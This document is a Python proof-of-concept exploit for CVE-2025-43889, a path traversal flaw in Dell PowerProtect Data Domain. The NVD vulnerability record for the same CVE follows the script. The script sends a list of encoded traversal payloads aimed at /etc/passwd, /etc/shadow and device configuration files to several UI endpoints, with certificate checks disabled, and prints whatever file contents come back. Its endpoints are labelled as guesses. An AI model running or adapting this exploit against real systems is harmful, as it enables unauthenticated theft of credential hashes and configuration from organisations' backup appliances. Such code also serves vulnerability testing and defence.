CVE-2025-43889

# CVE-2025-43889 - Dell PowerProtect Data Domain Path Traversal PoC # Path traversal vulnerability in the UI component # Attacker can read files outside the restricted directory import requests import sys TARGET = sys.argv[1] if len(sys.argv) > 1 else "https://target-data-domain.example.com" PORT = 443 # Path traversal payloads to test payloads = [ "/../../../../etc/passwd", "/..%2f..%2f..%2f..%2fetc/passwd", "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd", "/../../../../etc/shadow", "/../../../../data/config/dd.conf", "/../../../opt/ddrm/etc/ddr.conf", "/..\\..\\..\\..\\windows\\system32\\drivers\\etc\\hosts", ] def exploit_path_traversal(target_url, payload): """ Attempt path traversal on Dell PowerProtect Data Domain UI """ headers = { "User-Agent": "Mozilla/5.0 (compatible; SecurityResearcher/1.0)", "Accept": "*/*", "Connection": "close" } # Try various UI endpoints that may be vulnerable endpoints = [ f"{target_url}/ui{payload}", f"{target_url}/restui{payload}", f"{target_url}/ddrm{payload}", f"{target_url}/api/v1{payload}", ] for endpoint in endpoints: try: response = requests.get( endpoint, headers=headers, verify=False, timeout=10, allow_redirects=False ) # Check for successful path traversal if response.status_code == 200 and len(response.content) > 0: if b"root:" in response.content or b"[ddrm]" in response.content: print(f"[+] VULNERABLE: {endpoint}") print(f"[+] Response:\n{response.text[:500]}") return True except requests.exceptions.RequestException: continue return False if __name__ == "__main__": print(f"[*] Testing CVE-2025-43889 against {TARGET}") for payload in payloads: print(f"[*] Trying payload: {payload}") if exploit_path_traversal(TARGET, payload): print("[+] Exploit successful!") break else: print("[-] Target does not appear vulnerable")

{"cve": {"id": "CVE-2025-43889", "sourceIdentifier": "[email protected]", "published": "2025-10-07T19:15:36.800", "lastModified": "2025-10-14T20:11:45.030", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.4, LTS2024 release Versions 7.13.1.0 through 7.13.1.30, LTS 2023 release versions 7.10.1.0 through 7.10.1.60, contain an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in the UI. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Information exposure."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.7.1.0", "versionEndExcluding": "7.10.1.70", "matchCriteriaId": "7FCE50EA-F2B8-4455-A489-1947B0CBFEEA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.13.1.0", "versionEndExcluding": "7.13.1.40", "matchCriteriaId": "C0EA46C5-6776-411A-8FBC-5B32BC216888"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0.0", "versionEndExcluding": "8.5.0.0", "matchCriteriaId": "F5464021-E415-4D49-AE89-8190C9D4D6FA"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000376224/dsa-2025-333-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}